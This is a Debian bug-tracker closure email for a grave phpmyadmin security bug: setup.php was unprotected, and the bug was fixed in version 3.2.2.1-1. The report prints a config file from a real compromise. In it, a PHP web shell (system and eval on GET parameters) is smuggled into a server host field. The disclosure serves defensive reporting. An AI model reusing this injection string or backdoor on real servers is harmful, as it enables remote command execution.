Your message dated Wed, 14 Oct 2009 10:22:16 +0000
with message-id <[email protected]>
and subject line Bug#543460: fixed in phpmyadmin 4:3.2.2.1-1
has caused the Debian Bug report #543460,
regarding phpmyadmin: No password protection for setup.php script
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.9.1.1-11
Severity: grave
Tags: security
Justification: user security hole
After install, you can access http://{host}/phpmyadmin/scripts/setup.php
without entering any password.
By adding a new host in the configuration, an attacker can submit malicius code
to execute commands as
www-data user.
This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack:
/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
-- System Information:
Debian Release: 4.0
APT prefers oldstable
APT policy: (500, 'oldstable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-686
Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8)
Versions of packages phpmyadmin depends on:
ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy
ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti
ii perl 5.8.8-7etch6 Larry Wall's Practical Extraction
ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5
ii ucf 2.0020 Update Configuration File: preserv
Versions of packages phpmyadmin recommends:
ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD
pn php5-gd | php4-gd <none> (no description available)
pn php5-mcrypt | php4-mcrypt <none> (no description available)
-- debconf information:
phpmyadmin/setup-username: admin
phpmyadmin/reconfigure-webserver:
phpmyadmin/restart-webserver: false
--- End Message ---
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:3.2.2.1-1
We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:
phpmyadmin_3.2.2.1-1.diff.gz
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1.diff.gz
phpmyadmin_3.2.2.1-1.dsc
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1.dsc
phpmyadmin_3.2.2.1-1_all.deb
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1_all.deb
phpmyadmin_3.2.2.1.orig.tar.gz
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Michal Čihař <[email protected]> (supplier of updated phpmyadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Wed, 14 Oct 2009 10:58:28 +0200
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:3.2.2.1-1
Distribution: unstable
Urgency: low
Maintainer: Thijs Kinkhorst <[email protected]>
Changed-By: Michal Čihař <[email protected]>
Description:
phpmyadmin - MySQL web administration tool
Closes: 535044 543460
Changes:
phpmyadmin (4:3.2.2.1-1) unstable; urgency=low
.
* New upstream version.
- Fixes XSS (PMASA-2009-6, CVE-2009-3696, CVE-2009-3697).
* Register documentation on doc-base.
* Use mootools from Debian package rather than own copy.
* Allow saving of configuration from setup script only after explicit action
from administrator (Closes: #535044, #543460).
Checksums-Sha1:
043ba4b0a190929ec451ac8ff8faff147b0fa2f3 1230 phpmyadmin_3.2.2.1-1.dsc
80c8e2091347236bfc0f135d3f92753f760e6947 3709036 phpmyadmin_3.2.2.1.orig.tar.gz
0bc06da6192a224c575edd95dddb5071f11db7a4 38175 phpmyadmin_3.2.2.1-1.diff.gz
05eec7a14f3941b2caf7e70f66883c7c3aceaa74 3703786 phpmyadmin_3.2.2.1-1_all.deb
Checksums-Sha256:
24548da5b8ee77e1bef8d0658689969ea825ee0f869435198326ce358047881a 1230
phpmyadmin_3.2.2.1-1.dsc
99957d98e2610d5f77f83db2e025caecae344d590c8f5694412e5f942d6c0768 3709036
phpmyadmin_3.2.2.1.orig.tar.gz
ad0d35e124fb6020d4ea5b1d74923ab1fb2bbc882909502fafcd17b2a23b1240 38175
phpmyadmin_3.2.2.1-1.diff.gz
ead0d01e3061c3989b5ee7d4a944a89d374948e4e30fa7c008de4c4bc67b5936 3703786
phpmyadmin_3.2.2.1-1_all.deb
Files:
77812ffab6319c421d847d9807321933 1230 web extra phpmyadmin_3.2.2.1-1.dsc
42637af1d7d390fb94ae5460b3f84153 3709036 web extra
phpmyadmin_3.2.2.1.orig.tar.gz
728c63f9d79c655715a20d9980767ea0 38175 web extra phpmyadmin_3.2.2.1-1.diff.gz
c0f61d056b8d81b08da0d8aea2468370 3703786 web extra phpmyadmin_3.2.2.1-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAkrVkwUACgkQ3DVS6DbnVgQIhQCbBwo7+KDCrihyieNpLnjfQTMo
4dcAnRAvOTwt5xTLRKS0JIjI4B+CRR4s
=Jrvl
-----END PGP SIGNATURE-----
--- End Message ---
